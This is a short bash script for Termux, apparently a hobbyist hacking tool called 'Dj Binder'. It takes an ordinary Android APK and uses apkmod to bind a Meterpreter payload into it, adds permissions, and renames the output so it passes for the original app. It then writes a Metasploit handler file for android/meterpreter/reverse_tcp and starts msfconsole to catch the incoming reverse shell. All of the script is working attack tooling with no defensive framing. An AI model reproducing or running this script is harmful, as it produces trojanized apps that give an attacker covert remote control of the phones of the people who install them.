#!/data/data/com.termux/files/usr/bin/bash
figlet Dj Binder
cd /sdcard
mkdir DjBinder
echo "INPUT APP PATH"
read path
echo "INPUT LHOST"
read lhost
echo "INPUT LPORT"
read lport
echo "OUTPUT NAME.apk"
read output
apkmod -b "$path" -o /sdcard/DjBinder/payload.apk LHOST="$lhost" LPORT="$lport"
apkmod --enable-perm=/sdcard/DjBinder/payload.apk -o /sdcard/DjBinder/"$output"
cd /sdcard/DjBinder
rm -rf payload.apk
cd
cd djbinder
rm -rf d.rc
echo "LHOST$lhost"
echo "INTER LISTNER PORT"
read port
echo "use multi/handler" > d.rc
echo "set payload android/meterpreter/reverse_tcp" >> d.rc
echo "set lhost $lhost" >> d.rc
echo "set lport $port" >> d.rc
echo "exploit" >> d.rc
msfconsole -r d.rc
